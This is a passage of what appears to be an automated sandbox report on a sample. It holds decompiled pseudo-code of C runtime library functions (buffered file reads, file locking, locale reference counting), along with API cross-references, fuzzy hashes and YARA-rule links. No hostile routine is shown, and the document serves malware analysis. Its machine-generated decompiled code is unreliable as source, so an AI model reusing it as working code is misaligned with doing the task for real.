				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Strings

'B, xrefs: 0040C70F

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID: 'B
API String ID: 2805327698-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00414738, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2341600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2341600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2341600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02341600), ref: 00414050

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA58, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA58() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x425080;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x425080 = _t5;
				}
				_t6 = E00411CBA(_t5, 4);
				 *0x424060 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x422450;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4226d0) {
							break;
						}
						_t6 =  *0x424060;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x422460;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4224c0);
					return 0;
				} else {
					 *0x425080 = _t26;
					_t6 = E00411CBA(_t26, 4);
					 *0x424060 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0040fa58
0x0040fa60
0x0040fa63
0x0040fa6e
0x0040fa70
0x00000000
0x0040fa70
0x0040fa65
0x0040fa65
0x0040fa72
0x0040fa72
0x0040fa72
0x0040fa7a
0x0040fa81
0x0040fa88
0x0040faa8
0x0040faa8
0x0040faaa
0x0040fab6
0x0040fab6
0x0040fab9
0x0040fabc
0x0040fac5
0x00000000
0x00000000
0x0040fab1
0x0040fab1
0x0040fac9
0x0040faca
0x0040facc
0x0040fad2
0x0040fae6
0x0040faec
0x0040faf6
0x0040faf6
0x0040faf8
0x0040fafb
0x0040fafc
0x0040fb08
0x0040fa8a
0x0040fa8d
0x0040fa93
0x0040fa9a
0x0040faa1
0x00000000
0x0040faa3
0x0040faa5
0x0040faa7
0x0040faa7
0x0040faa1

APIs

__calloc_crt.LIBCMT ref: 0040FA7A
__calloc_crt.LIBCMT ref: 0040FA93

Strings

`$B, xrefs: 0040FACC
P$B, xrefs: 0040FAAA

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: e56331e4616de171219dccd971e0455493e892fc76003f67a58995f67ba85e27
Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
Opcode Fuzzy Hash: e56331e4616de171219dccd971e0455493e892fc76003f67a58995f67ba85e27
Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C

Uniqueness

Uniqueness Score: -1.00%

Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 004146FA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004146FA(intOrPtr* __eax, intOrPtr __edi) {
				intOrPtr _t10;
				intOrPtr* _t12;

				_t10 = __edi;
				if(__edi == 0 || __eax == 0) {
					return 0;
				} else {
					_t12 =  *__eax;
					if(_t12 != __edi) {
						 *__eax = __edi;
						E004145D2(__edi);
						if(_t12 != 0) {
							E00414661(_t12);
							if( *_t12 == 0 && _t12 != 0x422e40) {
								E00414489(_t12);
							}
						}
					}
					return _t10;
				}
			}

0x004146fa
0x004146fc
0x00414737
0x00414702
0x00414703
0x00414707
0x0041470a
0x0041470c
0x00414714
0x00414717
0x00414720
0x0041472b
0x00414730
0x00414720
0x00414714
0x00414734
0x00414734

APIs

___addlocaleref.LIBCMT ref: 0041470C

Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A

___removelocaleref.LIBCMT ref: 00414717

Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1

___freetlocinfo.LIBCMT ref: 0041472B

Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575

Strings

@.B, xrefs: 00414722

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
